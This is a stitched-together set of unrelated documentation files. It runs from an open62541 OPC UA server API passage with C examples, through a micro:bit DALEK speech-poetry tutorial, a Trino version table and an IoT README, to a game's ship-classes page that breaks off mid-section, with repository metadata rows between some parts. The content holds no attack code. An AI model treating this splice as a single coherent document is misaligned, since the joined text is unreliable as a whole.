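                                            monRequest, NULL,
                                            dataChangeNotification);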
Method Callbacks
^^^^^^^^^^^^^^^^
Method callbacks are set to `NULL` (not executable) when a method node is
added over the network. If remotely added methods shall actually be
executable, a callback can be attached from within the global constructor
via ``UA_Server_setMethodNode_callback``. See the Section
:ref:`object-interaction` for calling methods on an object.
.. code-block:: c
typedef UA_StatusCode
(*UA_MethodCallback)(UA_Server *server, const UA_NodeId *sessionId,
void *sessionContext, const UA_NodeId *methodId,
void *methodContext, const UA_NodeId *objectId,
void *objectContext, size_t inputSize,
const UA_Variant *input, size_t outputSize,
UA_Variant *output);
#ifdef UA_ENABLE_METHODCALLS
UA_StatusCode
UA_Server_setMethodNode_callback(UA_Server *server,
const UA_NodeId methodNodeId,
UA_MethodCallback methodCallback);
#endif
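A minimal sketch of attaching a callback (``helloMethod`` and
``methodNodeId`` are illustrative names):

.. code-block:: c

    /* Example method callback that copies its first input to the output */
    static UA_StatusCode
    helloMethod(UA_Server *server, const UA_NodeId *sessionId,
                void *sessionContext, const UA_NodeId *methodId,
                void *methodContext, const UA_NodeId *objectId,
                void *objectContext, size_t inputSize, const UA_Variant *input,
                size_t outputSize, UA_Variant *output) {
        if(inputSize > 0 && outputSize > 0)
            return UA_Variant_copy(&input[0], &output[0]);
        return UA_STATUSCODE_GOOD;
    }

    UA_Server_setMethodNode_callback(server, methodNodeId, helloMethod);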
.. _object-interaction:
Interacting with Objects
------------------------
Objects in the information model are represented as ObjectNodes. Some
convenience functions are provided to simplify the interaction with objects.
.. code-block:: c
/* Write an object property. The property is represented as a VariableNode with
* a ``HasProperty`` reference from the ObjectNode. The VariableNode is
* identified by its BrowseName. Writing the property sets the value attribute
* of the VariableNode.
*
* @param server The server object
* @param objectId The identifier of the object (node)
* @param propertyName The name of the property
* @param value The value to be written to the property
* @return The StatusCode for writing the property */
UA_StatusCode
UA_Server_writeObjectProperty(UA_Server *server, const UA_NodeId objectId,
const UA_QualifiedName propertyName,
const UA_Variant value);
/* Directly point to the scalar value instead of a variant */
UA_StatusCode
UA_Server_writeObjectProperty_scalar(UA_Server *server, const UA_NodeId objectId,
const UA_QualifiedName propertyName,
const void *value, const UA_DataType *type);
/* Read an object property.
*
* @param server The server object
* @param objectId The identifier of the object (node)
* @param propertyName The name of the property
* @param value Contains the property value after reading. Must not be NULL.
* @return The StatusCode for reading the property */
UA_StatusCode
UA_Server_readObjectProperty(UA_Server *server, const UA_NodeId objectId,
const UA_QualifiedName propertyName,
UA_Variant *value);
#ifdef UA_ENABLE_METHODCALLS
UA_CallMethodResult
UA_Server_call(UA_Server *server, const UA_CallMethodRequest *request);
#endif
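A short sketch of the property helpers (``objectId`` and the BrowseName
``"Status"`` in namespace 1 are illustrative values):

.. code-block:: c

    UA_Int32 status = 42;
    UA_Server_writeObjectProperty_scalar(server, objectId,
                                         UA_QUALIFIEDNAME(1, "Status"),
                                         &status, &UA_TYPES[UA_TYPES_INT32]);

    UA_Variant out;
    UA_Variant_init(&out);
    UA_Server_readObjectProperty(server, objectId,
                                 UA_QUALIFIEDNAME(1, "Status"), &out);
    /* ... use the value ... */
    UA_Variant_clear(&out); /* UA_Variant_deleteMembers in older versions */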
.. _addnodes:
Node Addition and Deletion
--------------------------
When creating dynamic node instances at runtime, chances are that you will
not care about the specific NodeId of the new node, as long as you can
reference it later. When passing numeric NodeIds with a numeric identifier 0,
the stack evaluates this as "select a random unassigned numeric NodeId in
that namespace". To find out which NodeId was actually assigned to the new
node, you may pass a pointer `outNewNodeId`, which will (after a successful
node insertion) contain the nodeId of the new node. You may also pass a
``NULL`` pointer if this result is not needed.
See the Section :ref:`node-lifecycle` on constructors and on attaching
user-defined data to nodes.
The methods for node addition and deletion take mostly const arguments that
are not modified. When creating a node, a deep copy of the node identifier,
node attributes, etc. is created. Therefore, it is possible to call for
example ``UA_Server_addVariableNode`` with a value attribute (a
:ref:`variant`) pointing to a memory location on the stack. If you need
changes to a variable value to manifest at a specific memory location, please
use a :ref:`datasource` or a :ref:`value-callback`.
.. code-block:: c
/* Protect against redundant definitions for server/client */
#ifndef UA_DEFAULT_ATTRIBUTES_DEFINED
#define UA_DEFAULT_ATTRIBUTES_DEFINED
/* The default for variables is "BaseDataType" for the datatype, -2 for the
* valuerank and a read-accesslevel. */
extern const UA_VariableAttributes UA_VariableAttributes_default;
extern const UA_VariableTypeAttributes UA_VariableTypeAttributes_default;
/* Methods are executable by default */
extern const UA_MethodAttributes UA_MethodAttributes_default;
/* The remaining attribute definitions are currently all zeroed out */
extern const UA_ObjectAttributes UA_ObjectAttributes_default;
extern const UA_ObjectTypeAttributes UA_ObjectTypeAttributes_default;
extern const UA_ReferenceTypeAttributes UA_ReferenceTypeAttributes_default;
extern const UA_DataTypeAttributes UA_DataTypeAttributes_default;
extern const UA_ViewAttributes UA_ViewAttributes_default;
#endif
/* Don't use this function. There are typed versions as inline functions. */
UA_StatusCode
__UA_Server_addNode(UA_Server *server, const UA_NodeClass nodeClass,
const UA_NodeId *requestedNewNodeId,
const UA_NodeId *parentNodeId,
const UA_NodeId *referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId *typeDefinition,
const UA_NodeAttributes *attr,
const UA_DataType *attributeType,
void *nodeContext, UA_NodeId *outNewNodeId);
static UA_INLINE UA_StatusCode
UA_Server_addVariableNode(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId typeDefinition,
const UA_VariableAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_VARIABLE, &requestedNewNodeId,
&parentNodeId, &referenceTypeId, browseName,
&typeDefinition, (const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_VARIABLEATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addVariableTypeNode(UA_Server *server,
const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId typeDefinition,
const UA_VariableTypeAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_VARIABLETYPE,
&requestedNewNodeId, &parentNodeId, &referenceTypeId,
browseName, &typeDefinition,
(const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_VARIABLETYPEATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addObjectNode(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId typeDefinition,
const UA_ObjectAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_OBJECT, &requestedNewNodeId,
&parentNodeId, &referenceTypeId, browseName,
&typeDefinition, (const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_OBJECTATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addObjectTypeNode(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_ObjectTypeAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_OBJECTTYPE, &requestedNewNodeId,
&parentNodeId, &referenceTypeId, browseName,
&UA_NODEID_NULL, (const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_OBJECTTYPEATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addViewNode(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_ViewAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_VIEW, &requestedNewNodeId,
&parentNodeId, &referenceTypeId, browseName,
&UA_NODEID_NULL, (const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_VIEWATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addReferenceTypeNode(UA_Server *server,
const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_ReferenceTypeAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_REFERENCETYPE,
&requestedNewNodeId, &parentNodeId, &referenceTypeId,
browseName, &UA_NODEID_NULL,
(const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_REFERENCETYPEATTRIBUTES],
nodeContext, outNewNodeId);
}
static UA_INLINE UA_StatusCode
UA_Server_addDataTypeNode(UA_Server *server,
const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_DataTypeAttributes attr,
void *nodeContext, UA_NodeId *outNewNodeId) {
return __UA_Server_addNode(server, UA_NODECLASS_DATATYPE, &requestedNewNodeId,
&parentNodeId, &referenceTypeId, browseName,
&UA_NODEID_NULL, (const UA_NodeAttributes*)&attr,
&UA_TYPES[UA_TYPES_DATATYPEATTRIBUTES],
nodeContext, outNewNodeId);
}
UA_StatusCode
UA_Server_addDataSourceVariableNode(UA_Server *server,
const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId typeDefinition,
const UA_VariableAttributes attr,
const UA_DataSource dataSource,
void *nodeContext, UA_NodeId *outNewNodeId);
#ifdef UA_ENABLE_METHODCALLS
UA_StatusCode
UA_Server_addMethodNodeEx(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_MethodAttributes attr, UA_MethodCallback method,
size_t inputArgumentsSize, const UA_Argument *inputArguments,
const UA_NodeId inputArgumentsRequestedNewNodeId,
UA_NodeId *inputArgumentsOutNewNodeId,
size_t outputArgumentsSize, const UA_Argument *outputArguments,
const UA_NodeId outputArgumentsRequestedNewNodeId,
UA_NodeId *outputArgumentsOutNewNodeId,
void *nodeContext, UA_NodeId *outNewNodeId);
static UA_INLINE UA_StatusCode
UA_Server_addMethodNode(UA_Server *server, const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId, const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName, const UA_MethodAttributes attr,
UA_MethodCallback method,
size_t inputArgumentsSize, const UA_Argument *inputArguments,
size_t outputArgumentsSize, const UA_Argument *outputArguments,
void *nodeContext, UA_NodeId *outNewNodeId) {
return UA_Server_addMethodNodeEx(server, requestedNewNodeId, parentNodeId,
referenceTypeId, browseName, attr, method,
inputArgumentsSize, inputArguments, UA_NODEID_NULL, NULL,
outputArgumentsSize, outputArguments, UA_NODEID_NULL, NULL,
nodeContext, outNewNodeId);
}
#endif
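Putting the above together, the following sketch adds an Int32 variable below
the Objects folder and lets the server assign the NodeId (the names and
values are illustrative):

.. code-block:: c

    UA_VariableAttributes attr = UA_VariableAttributes_default;
    UA_Int32 myInteger = 42;
    /* The attributes are deep-copied, so pointing into stack memory is fine */
    UA_Variant_setScalar(&attr.value, &myInteger, &UA_TYPES[UA_TYPES_INT32]);
    attr.displayName = UA_LOCALIZEDTEXT("en-US", "MyInteger");

    UA_NodeId newNodeId;
    UA_Server_addVariableNode(server,
        UA_NODEID_NULL, /* numeric identifier 0: let the server choose */
        UA_NODEID_NUMERIC(0, UA_NS0ID_OBJECTSFOLDER),
        UA_NODEID_NUMERIC(0, UA_NS0ID_ORGANIZES),
        UA_QUALIFIEDNAME(1, "MyInteger"),
        UA_NODEID_NUMERIC(0, UA_NS0ID_BASEDATAVARIABLETYPE),
        attr, NULL, &newNodeId);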
The method pair ``UA_Server_addNode_begin`` and ``_finish`` splits the
AddNodes service into two parts. This is useful if the node shall be modified
before finishing the instantiation, for example to add children with specific
NodeIds. Otherwise, mandatory children (e.g. of an ObjectType) are added with
pseudo-random unique NodeIds. Existing children are detected during the
_finish part via their matching BrowseName.
The _begin method:
- prepares the node and adds it to the nodestore
- copies some unassigned attributes from the TypeDefinition node internally
- adds the references to the parent (and the TypeDefinition if applicable)
- performs type-checking of variables.
You can add an object node without a parent if you set the parentNodeId and
referenceTypeId to ``UA_NODEID_NULL``. Then you need to add the parent
reference and the HasTypeDefinition reference yourself before calling the
_finish method. Note that this is only allowed for object nodes.
The _finish method:
- copies mandatory children
- calls the node constructor(s) at the end
- may remove the node if it encounters an error.
The special ``UA_Server_addMethodNode_finish`` method needs to be used for
method nodes: there, the input and output arguments must be specified
explicitly, as they are added during the finish step (if not already
present).

The ``attr`` argument must have the type matching the node class:
``VariableAttributes`` for variables, ``ObjectAttributes`` for objects, and
so on. Missing attributes are taken from the TypeDefinition node if
applicable.
.. code-block:: c
UA_StatusCode
UA_Server_addNode_begin(UA_Server *server, const UA_NodeClass nodeClass,
const UA_NodeId requestedNewNodeId,
const UA_NodeId parentNodeId,
const UA_NodeId referenceTypeId,
const UA_QualifiedName browseName,
const UA_NodeId typeDefinition,
const void *attr, const UA_DataType *attributeType,
void *nodeContext, UA_NodeId *outNewNodeId);
UA_StatusCode
UA_Server_addNode_finish(UA_Server *server, const UA_NodeId nodeId);
#ifdef UA_ENABLE_METHODCALLS
UA_StatusCode
UA_Server_addMethodNode_finish(UA_Server *server, const UA_NodeId nodeId,
UA_MethodCallback method,
size_t inputArgumentsSize, const UA_Argument* inputArguments,
size_t outputArgumentsSize, const UA_Argument* outputArguments);
#endif
/* Deletes a node and optionally all references leading to the node. */
UA_StatusCode
UA_Server_deleteNode(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean deleteReferences);
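A sketch of the two-step instantiation described above (the NodeIds and names
are illustrative):

.. code-block:: c

    UA_ObjectAttributes objAttr = UA_ObjectAttributes_default;
    UA_Server_addNode_begin(server, UA_NODECLASS_OBJECT,
        UA_NODEID_NUMERIC(1, 1000),
        UA_NODEID_NUMERIC(0, UA_NS0ID_OBJECTSFOLDER),
        UA_NODEID_NUMERIC(0, UA_NS0ID_ORGANIZES),
        UA_QUALIFIEDNAME(1, "MyObject"),
        UA_NODEID_NUMERIC(0, UA_NS0ID_BASEOBJECTTYPE),
        &objAttr, &UA_TYPES[UA_TYPES_OBJECTATTRIBUTES],
        NULL, NULL);
    /* ... add children with specific NodeIds here ... */
    UA_Server_addNode_finish(server, UA_NODEID_NUMERIC(1, 1000));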
Reference Management
--------------------
.. code-block:: c
UA_StatusCode
UA_Server_addReference(UA_Server *server, const UA_NodeId sourceId,
const UA_NodeId refTypeId,
const UA_ExpandedNodeId targetId, UA_Boolean isForward);
UA_StatusCode
UA_Server_deleteReference(UA_Server *server, const UA_NodeId sourceNodeId,
const UA_NodeId referenceTypeId, UA_Boolean isForward,
const UA_ExpandedNodeId targetNodeId,
UA_Boolean deleteBidirectional);
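For example, an existing node can be organized below the Objects folder like
this (the target NodeId is illustrative):

.. code-block:: c

    UA_Server_addReference(server,
        UA_NODEID_NUMERIC(0, UA_NS0ID_OBJECTSFOLDER),
        UA_NODEID_NUMERIC(0, UA_NS0ID_ORGANIZES),
        UA_EXPANDEDNODEID_NUMERIC(1, 1000),
        true /* forward reference */);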
.. _events:
Events
------
The method ``UA_Server_createEvent`` creates an event and represents it as a
node. The node receives a unique `EventId` which is automatically added to
the node.
The method returns, through ``outNodeId``, the `NodeId` of the object node
which represents the event. The `NodeId` can be used to set the attributes
of the event. The generated `NodeId` is always numeric. ``outNodeId`` cannot
be ``NULL``.
Note: In order to see an event in UAExpert, the field `Time` must be given a
value!
The method ``UA_Server_triggerEvent`` "triggers" an event by adding it to all
monitored items of the specified origin node and those of all its parents.
Any filters specified by the monitored items are automatically applied. The
`EventId` for the new event is generated automatically and is returned
through ``outEventId``; ``NULL`` can be passed if the `EventId` is not
needed. ``deleteEventNode`` specifies whether the node representation of the
event (generated by ``UA_Server_createEvent``) should be deleted after
invoking the method: ``UA_TRUE`` causes the node to be deleted, while keeping
the node can be useful if events with similar attributes are triggered
frequently.
.. code-block:: c
#ifdef UA_ENABLE_SUBSCRIPTIONS_EVENTS
/* The EventQueueOverflowEventType is defined as abstract, therefore we can not
* create an instance of that type directly, but need to create a subtype. The
* following is an arbitrary number which shall refer to our internal overflow
* type. This is already posted on the OPC Foundation bug tracker under the
* following link for clarification:
* https://opcfoundation-onlineapplications.org/mantis/view.php?id=4206 */
# define UA_NS0ID_SIMPLEOVERFLOWEVENTTYPE 4035
/* Creates a node representation of an event
*
* @param server The server object
* @param eventType The type of the event for which a node should be created
* @param outNodeId The NodeId of the newly created node for the event
* @return The StatusCode of the UA_Server_createEvent method */
UA_StatusCode
UA_Server_createEvent(UA_Server *server, const UA_NodeId eventType,
UA_NodeId *outNodeId);
/* Triggers a node representation of an event by applying EventFilters and
 * adding the event to the appropriate queues.
 *
 * @param server The server object
 * @param eventNodeId The NodeId of the node representation of the event which should be triggered
 * @param originId The NodeId of the node from which the event originates
 * @param outEventId The EventId of the new event
 * @param deleteEventNode Specifies whether the node representation of the event should be deleted
 * @return The StatusCode of the UA_Server_triggerEvent method */
UA_StatusCode
UA_Server_triggerEvent(UA_Server *server, const UA_NodeId eventNodeId, const UA_NodeId originId,
UA_ByteString *outEventId, const UA_Boolean deleteEventNode);
#endif /* UA_ENABLE_SUBSCRIPTIONS_EVENTS */
UA_StatusCode
UA_Server_updateCertificate(UA_Server *server,
const UA_ByteString *oldCertificate,
const UA_ByteString *newCertificate,
const UA_ByteString *newPrivateKey,
UA_Boolean closeSessions,
UA_Boolean closeSecureChannels);
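Based on the event functions above, a minimal event lifecycle could be
sketched as follows (this requires the subscriptions-events build option;
``server`` is assumed to be a running server instance):

.. code-block:: c

    UA_NodeId eventNodeId;
    UA_Server_createEvent(server,
                          UA_NODEID_NUMERIC(0, UA_NS0ID_BASEEVENTTYPE),
                          &eventNodeId);

    /* Set the Time field so that e.g. UAExpert displays the event */
    UA_DateTime eventTime = UA_DateTime_now();
    UA_Server_writeObjectProperty_scalar(server, eventNodeId,
                                         UA_QUALIFIEDNAME(0, "Time"),
                                         &eventTime,
                                         &UA_TYPES[UA_TYPES_DATETIME]);

    /* Trigger from the Server object and delete the event node afterwards */
    UA_Server_triggerEvent(server, eventNodeId,
                           UA_NODEID_NUMERIC(0, UA_NS0ID_SERVER),
                           NULL, UA_TRUE);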
Utility Functions
-----------------
.. code-block:: c
/* Add a new namespace to the server. Returns the index of the new namespace */
UA_UInt16 UA_Server_addNamespace(UA_Server *server, const char* name);
/* Get namespace by name from the server. */
UA_StatusCode
UA_Server_getNamespaceByName(UA_Server *server, const UA_String namespaceUri,
size_t* foundIndex);
#ifdef UA_ENABLE_HISTORIZING
UA_Boolean
UA_Server_AccessControl_allowHistoryUpdateUpdateData(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *nodeId,
UA_PerformUpdateType performInsertReplace,
const UA_DataValue *value);
UA_Boolean
UA_Server_AccessControl_allowHistoryUpdateDeleteRawModified(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *nodeId,
UA_DateTime startTimestamp,
UA_DateTime endTimestamp,
bool isDeleteModified);
#endif // UA_ENABLE_HISTORIZING
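A short sketch of the namespace helpers (the URI is illustrative):

.. code-block:: c

    char nsUri[] = "http://example.org/ns";
    UA_UInt16 nsIdx = UA_Server_addNamespace(server, nsUri);

    size_t foundIdx;
    UA_Server_getNamespaceByName(server, UA_STRING(nsUri), &foundIdx);
    /* foundIdx now holds the same index as nsIdx */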
------
Computers and robots that talk feel more "human".
So often we learn about what a computer is up to through a graphical user
interface (GUI). In the case of a BBC micro:bit the GUI is a 5x5 LED matrix,
which leaves a lot to be desired.
Getting the micro:bit talk to you is one way to express information in a fun,
efficient and useful way. To this end, we have integrated a simple speech
synthesiser based upon a reverse-engineered version of a synthesiser from the
early 1980s. It sounds very cute, in an "all humans must die" sort of a way.
With this in mind, we're going to use the speech synthesiser to create...
DALEK Poetry
++++++++++++
.. image:: dalek.jpg
It's a little known fact that DALEKs enjoy poetry ~ especially limericks.
They go wild for anapestic meter with a strict AABBA form. Who'd have thought?
(Actually, as we'll learn below, it's The Doctor's fault DALEKs like limericks,
much to the annoyance of Davros.)
In any case, we're going to create a DALEK poetry recital on demand.
Say Something
+++++++++++++
Before the device can talk you need to plug in a speaker like this:
.. image:: ../speech.png
The simplest way to get the device to speak is to import the ``speech`` module
and use the ``say`` function like this::
import speech
speech.say("Hello, World")
While this is cute it's certainly not DALEK enough for our taste, so we need to
change some of the parameters that the speech synthesiser uses to produce the
voice. Our speech synthesiser is quite powerful in this respect because we can
change four parameters:
* ``pitch`` - how high or low the voice sounds (0 = high, 255 = Barry White)
* ``speed`` - how quickly the device talks (0 = impossible, 255 = bedtime story)
* ``mouth`` - how tight-lipped or overtly enunciating the voice sounds (0 = ventriloquist's dummy, 255 = Foghorn Leghorn)
* ``throat`` - how relaxed or tense is the tone of voice (0 = falling apart, 255 = totally chilled)
Collectively, these parameters control the quality of sound - a.k.a. the
timbre. To be honest, the best way to get the tone of voice you want is to
experiment, use your judgement and adjust.
To adjust the settings you pass them in as arguments to the ``say`` function.
More details can be found in the ``speech`` module's API documentation.
After some experimentation we've worked out this sounds quite DALEK-esque::
speech.say("I am a DALEK - EXTERMINATE", speed=120, pitch=100, throat=100, mouth=200)
Poetry on Demand
++++++++++++++++
Being Cyborgs DALEKs use their robot capabilities to compose poetry and it
turns out that the algorithm they use is written in Python like this::
# DALEK poetry generator, by The Doctor
import speech
import random
from microbit import sleep
# Randomly select fragments to interpolate into the template.
location = random.choice(["brent", "trent", "kent", "tashkent"])
action = random.choice(["wrapped up", "covered", "sang to", "played games with"])
obj = random.choice(["head", "hand", "dog", "foot"])
prop = random.choice(["in a tent", "with cement", "with some scent",
"that was bent"])
result = random.choice(["it ran off", "it glowed", "it blew up",
"it turned blue"])
attitude = random.choice(["in the park", "like a shark", "for a lark",
"with a bark"])
conclusion = random.choice(["where it went", "its intent", "why it went",
"what it meant"])
# A template of the poem. The {} are replaced by the named fragments.
poem = [
"there was a young man from {}".format(location),
"who {} his {} {}".format(action, obj, prop),
"one night after dark",
"{} {}".format(result, attitude),
"and he never worked out {}".format(conclusion),
"EXTERMINATE",
]
# Loop over each line in the poem and use the speech module to recite it.
for line in poem:
speech.say(line, speed=120, pitch=100, throat=100, mouth=200)
sleep(500)
As the comments demonstrate, it's a very simple in design:
* Named fragments (``location``, ``prop``, ``attitude`` etc) are randomly generated from pre-defined lists of possible values. Note the use of ``random.choice`` to select a single item from a list.
* A template of a poem is defined as a list of stanzas with "holes" in them (denoted by ``{}``) into which the named fragments will be put using the ``format`` method.
* Finally, Python loops over each item in the list of filled-in poetry stanzas and uses ``speech.say`` with the settings for the DALEK voice to recite the poem. A pause of 500 milliseconds is inserted between each line because even DALEKs need to take a breath.
Interestingly the original poetry related routines were written by Davros in
`FORTRAN <https://en.wikipedia.org/wiki/Fortran>`_ (an appropriate
language for DALEKS since you type it ALL IN CAPITAL LETTERS). However, The
Doctor went back in time to precisely the point between Davros's
`unit tests <https://en.wikipedia.org/wiki/Unit_testing>`_
passing and the
`deployment pipeline <https://en.wikipedia.org/wiki/Continuous_delivery>`_
kicking in. At this instant he was able to insert a MicroPython interpreter
into the DALEK operating system and the code you see above into the DALEK
memory banks as a sort of long hidden Time-Lord
`Easter Egg <https://en.wikipedia.org/wiki/Easter_egg_(media)>`_ or
`Rickroll <https://www.youtube.com/watch?v=dQw4w9WgXcQ>`_.
Phonemes
++++++++
You'll notice that sometimes, the ``say`` function doesn't accurately translate
from English words into the correct sound. To have fine grained control of the
output, use phonemes: the building-block sounds of language.
The advantage of using phonemes is that you don't have to know how to spell!
Rather, you only have to know how to say the word in order to spell it
phonetically.
A full list of the phonemes the speech synthesiser understands can be found in
the API documentation for speech. Alternatively, save yourself a lot of time by
passing in English words to the ``translate`` function. It'll return a first
approximation of the phonemes it would use to generate the audio. This result
can be hand-edited to improve the accuracy, inflection and emphasis (so it
sounds more natural).
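For example, a quick round-trip through the synthesiser could look like this
(the word chosen here is arbitrary)::

    import speech

    phonemes = speech.translate("exterminate")
    # Hand-edit the returned phonemes here if needed, then:
    speech.pronounce(phonemes)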
The ``pronounce`` function is used for phoneme output like this::
    speech.pronounce("/HEH5EH4EH3EH2EH2EH3EH4EH5EHLP.")
How could you improve on The Doctor's code to make it use phonemes?
Sing A Song of Micro:bit
++++++++++++++++++++++++
By changing the ``pitch`` setting and calling the ``sing`` function it's
possible to make the device sing (although it's not going to win Eurovision any
time soon).
The mapping from pitch numbers to musical notes is shown below:
.. image:: ../speech-pitch.png
The ``sing`` function must take phonemes and pitch as input like this::
speech.sing("#115DOWWWW")
Notice how the pitch to be sung is prepended to the phoneme with a hash
(``#``). The pitch will remain the same for subsequent phonemes until a new
pitch is annotated.
The following example demonstrates how all three generative functions (``say``,
``pronounce`` and ``sing``) can be used to produce speech like output:
.. include:: ../../examples/speech.py
:code: python
.. footer:: The image of the DALEK is licensed as per the details here: https://commons.wikimedia.org/wiki/File:Dalek_(Dr_Who).jpg The image of DAVROS is licensed as per the details here: https://en.wikipedia.org/wiki/File:Davros_and_Daleks.jpg
Multi-objective
===============
.. toctree::
:maxdepth: 2
samplers
study
trial
Presto version compatibility
============================
The following matrix details the compatible Trino Admin and Presto versions.
============================ ================================
Trino Admin version Compatible Trino/Presto versions
============================ ================================
2.13 345+
2.12 345
2.11 338
2.10 332
2.9 332
2.8 323
2.7 312
2.6 302
2.5 0.213
2.5 0.208
2.4, 2.5 0.203
2.4, 2.5 0.195
2.3 0.188
============================ ================================
| 35.583333 | 76 | 0.251756 |
83abafcfaba80664d0c171c118cb3847406d454f | 381 | rst | reStructuredText | examples/integriot_two_nodes/leds/README.rst | ulno/iot-devkit | 6e90c1c207f23c4b5bf374f58d3701550e6c70ca | [
"MIT"
] | null | null | null | examples/integriot_two_nodes/leds/README.rst | ulno/iot-devkit | 6e90c1c207f23c4b5bf374f58d3701550e6c70ca | [
"MIT"
] | null | null | null | examples/integriot_two_nodes/leds/README.rst | ulno/iot-devkit | 6e90c1c207f23c4b5bf374f58d3701550e6c70ca | [
"MIT"
] | 1 | 2020-07-23T03:03:38.000Z | 2020-07-23T03:03:38.000Z | Node Description
================
This node is named 'infoboard' and has two actors:
- led1: the onboard LED; it can be switched on with the "on" message and off with the "off" message
Connected devices
-----------------
Describe which devices (actors and sensors) are connected to it.
The onboard LED is used.
Functionality
-------------
The LED can be switched on and off.
| 19.05 | 98 | 0.661417 |
129ebc7948a62127133bb30c0ea534d5585b865a | 238 | rst | reStructuredText | doc/source/iam/api-reference/tenant-management.rst | opentelekomcloud/docs | bf7f76b5c8f74af898e3b3f726ee563c89ec2fed | [
"Apache-2.0"
] | 1 | 2020-03-29T08:41:50.000Z | 2020-03-29T08:41:50.000Z | doc/source/iam/api-reference/tenant-management.rst | opentelekomcloud/docs | bf7f76b5c8f74af898e3b3f726ee563c89ec2fed | [
"Apache-2.0"
] | 34 | 2020-02-21T17:23:45.000Z | 2020-09-30T09:23:10.000Z | doc/source/iam/api-reference/tenant-management.rst | OpenTelekomCloud/docs | bf7f76b5c8f74af898e3b3f726ee563c89ec2fed | [
"Apache-2.0"
] | 14 | 2017-08-01T09:33:20.000Z | 2019-12-09T07:39:26.000Z | =================
Tenant Management
=================
.. toctree::
:maxdepth: 1
querying-the-list-of-domains-accessible-to-users.md
querying-the-password-strength-policy.md
querying-the-password-strength-policy-by-option.md
| 21.636364 | 54 | 0.642857 |
b09d6216f6627a818ee97fb6049b7164c90ca16c | 2,405 | rst | reStructuredText | doc_src/source/ships/ship_classes.rst | gtaylor/dott | b0dfbecc1171ed82566ecf814a73ce3dcaa468be | [
"BSD-3-Clause"
] | 3 | 2016-01-10T09:22:01.000Z | 2016-05-01T23:16:16.000Z | doc_src/source/ships/ship_classes.rst | gtaylor/dott | b0dfbecc1171ed82566ecf814a73ce3dcaa468be | [
"BSD-3-Clause"
] | 1 | 2016-03-29T02:52:49.000Z | 2016-03-29T02:52:49.000Z | doc_src/source/ships/ship_classes.rst | gtaylor/dott | b0dfbecc1171ed82566ecf814a73ce3dcaa468be | [
"BSD-3-Clause"
] | 1 | 2020-04-16T15:45:26.000Z | 2020-04-16T15:45:26.000Z | .. _ships-ship_classes:
============
Ship Classes
============
There are many different sizes of ships, typically called a *ship class*. While
a ship's class does not limit it to certain roles, the class and size of a ship
strongly influence what said ship can be used for.
A newer player will most likely start with Fighters, working their way up
to whatever ship class feels most comfortable.
.. tip:: Bigger does not always mean better for every situation.
Fighters
--------
Fighters are small, single-pilot ships that require no crew. While some
fighter class ships may be able to carry more than one person, this is the
solo pilot's bread and butter.
Frigates
--------
Frigates are the smallest vessels that are typically manned by a crew, instead
of a single pilot. Frigates are small and simple enough to be easy and
efficient to operate without help or escort.
Cruisers
--------
Cruisers are the next step up from frigates, trading speed and maneuverability
for more defensive and/or offensive capabilities. Cruisers typically benefit
from having others aboard.
Cruisers may have a difficult time fending off Fighters without Fighter or
Frigate support of their own.
Battlecruisers
--------------
Battlecruisers are the size of a Cruiser, but typically carry Battleship
weaponry. This allows for a cheap way to attack larger targets without
having to rely exclusively on the more expensive and cumbersome Battleships.
Battlecruisers tend to be about as durable as a Cruiser. Due to their larger
weapons (meant for larger targets), Battlecruisers may struggle to fend
off Fighters and Frigates effectively.
Battleships
-----------
